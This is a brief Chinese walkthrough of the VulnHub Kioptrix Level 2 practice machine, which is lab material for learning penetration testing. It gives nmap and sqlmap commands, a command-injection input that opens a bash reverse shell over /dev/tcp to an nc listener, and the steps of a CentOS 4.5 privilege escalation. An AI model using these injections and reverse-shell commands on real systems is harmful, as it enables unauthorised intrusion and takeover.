VulnHub-Kioptrix-Level 2
2024年2月16日nmap 扫描到靶机IP,浏览器访问

继续搜集信息 nmap -sV

先从Web服务下手,nitko启动
sqlmap -u "http://192.168.1.106/index.php" --data="uname=test&psw=pass" --risk=3
或者Burpsuite抓包sqlmap -r 106.txt

爆出密码后进入系统

看起来是个命令执行 127.0.0.1|whomai

本地:nc -lnvp 5000
输入框
127.0.0.1|bash -i >& /dev/tcp/192.168.1.106/5000 0>&1

信息搜集的Linenum
https://github.com/isecurity-club/Pentest-Methodologies/tree/master/PostExploit/File-Upload-Download
低权限目录不能直接下载,但是可以写入/tmp

查看一下

找CentOS 4.5的利用方法

这个提权直接在靶机上下载,编译执行,拿到root
